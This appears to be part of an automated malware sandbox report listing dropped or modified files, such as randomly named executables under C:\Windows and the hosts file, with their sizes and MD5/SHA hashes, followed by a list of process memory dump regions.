e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\kbtjlvyu\vyqvqhk.exe

Filesize
7.3MB

MD5
2f0bf0d158a71e748e92fc6957b34ab4

SHA1
a83772f11d57b5800e6498a24cc18bba0697fab3

SHA256
795280f728fbe6f9209b428a55c23318ec5717d3e9dc6bf6fd5c850b7c70ab4a

SHA512
189a66366844cf846fa7ccd05e563779f5676800c2d7cd50370d4cb1f7a00da07a7cc7b1d71b09123c857c64db96fa191362628947932b03c4cdaaace0ed813d

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\teuulnibr\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\teuulnibr\bftvueiwt\Result.txt

Filesize
774B

MD5
735c43603ab284b3df9ea87dc592d271

SHA1
0856204a8820af6b66064773215e1c12bd9af089

SHA256
370d891249c1ab83781fcb395a42592edcd28590edd2bd68019155479b645c46

SHA512
0d38c4f8fc11124f60f9fc544fd0a9edaefa1fd543b2a8099c3dd9d26a68b1f74de1416cde1081c44988787f66237ee2b48aaca76f55643142ad42408a8d142e

Download Submit
C:\Windows\teuulnibr\bftvueiwt\Result.txt

Filesize
1KB

MD5
6045c4361f4c30509cee510a25467e2e

SHA1
bf225cd64f459ebb32a534e73c53a71df9d59c86

SHA256
480ea256f54af28871b1c4f31f5c292e3d2701ec022c02a1219d5f9f1b55b698

SHA512
169e66143f7f369605d7cd2b54a35ec62e3c7aaa9721c4c565ff884c46b72e26a7f1149400a037a972b931c0348d3ab16bb138c09f887fc3a7d254113135834f

Download Submit
C:\Windows\teuulnibr\bftvueiwt\Result.txt

Filesize
1KB

MD5
0228db7802c0ff587d5715f523638afa

SHA1
de50018a36c3f0c149ceb2d36b5666111ed34453

SHA256
6d01b2dda2b38aba729aa70224e90fc7f5ddf59eb40de01ec7d74904aebd2e34

SHA512
f5d39f0c89730e0dbc8bed80e97b37c7a9ea7d0941691d49e4f4bf80a4fad0b071e5a3e4faffd0eb8fcc5148c8ec74152669329bd73f36abb52bcbb6d89a1d5a

Download Submit
C:\Windows\teuulnibr\bftvueiwt\Result.txt

Filesize
3KB

MD5
e7b4213a2b15b02d93c4677f339c1b85

SHA1
c9d8aa1c1c7872e019afbce0b8631abf67f200d4

SHA256
97e97797e960abcb9e88d2968d6dc55f83ffaf1c4c11246beff5e35da84e783c

SHA512
a3529c67ff8e06694e46ae5bd20827a0f983a98d2f828993478107697540b3e683c216c5d887a3952379d7dd1837f054dfea15cf5e716ddd7095bc685d02e3ab

Download Submit
C:\Windows\teuulnibr\bftvueiwt\Result.txt

Filesize
4KB

MD5
881983e6c77399a481ce09a5a94df22f

SHA1
24bee0436ec97cd822c80ce4ab7be3d25634bdb0

SHA256
215c9f53d38d703824d0fff8167ec5cd17d77fed5bbb3ec55dbeda0e61ee4864

SHA512
883403632546bbe1525fdaa6da736ca839a828a3943405c62aef411baef808650078b2f26360f9ce133f6bf4d1920197971a8f5d0a80bd41cca65f2feadd9c9b

Download Submit
C:\Windows\teuulnibr\bftvueiwt\synletgiy.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\teuulnibr\bftvueiwt\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
memory/116-3-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/860-495-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-527-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-177-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-496-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-245-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-163-0x000001F03F900000-0x000001F03F910000-memory.dmp

Filesize
64KB

Download
memory/860-230-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-199-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-782-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-182-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-221-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-781-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-210-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/860-160-0x00007FF73A970000-0x00007FF73AA90000-memory.dmp

Filesize
1.1MB

Download
memory/1004-229-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/1432-227-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/1460-202-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/1572-234-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/1856-168-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/1892-172-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/1912-206-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/2012-138-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/2012-142-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/2316-193-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/3188-75-0x0000000000E50000-0x0000000000E9C000-memory.dmp

Filesize
304KB

Download
memory/3356-244-0x0000000000240000-0x0000000000252000-memory.dmp

Filesize
72KB

Download
memory/3556-189-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/3576-197-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/3776-211-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/3888-219-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/3900-185-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/4144-148-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/4144-164-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4260-232-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/4620-134-0x00007FF64D0F0000-0x00007FF64D1DE000-memory.dmp

Filesize
952KB

Download
memory/4620-132-0x00007FF64D0F0000-0x00007FF64D1DE000-memory.dmp

Filesize
952KB

Download
memory/4800-224-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/4868-215-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download
memory/5048-180-0x00007FF7B0040000-0x00007FF7B009B000-memory.dmp

Filesize
364KB

Download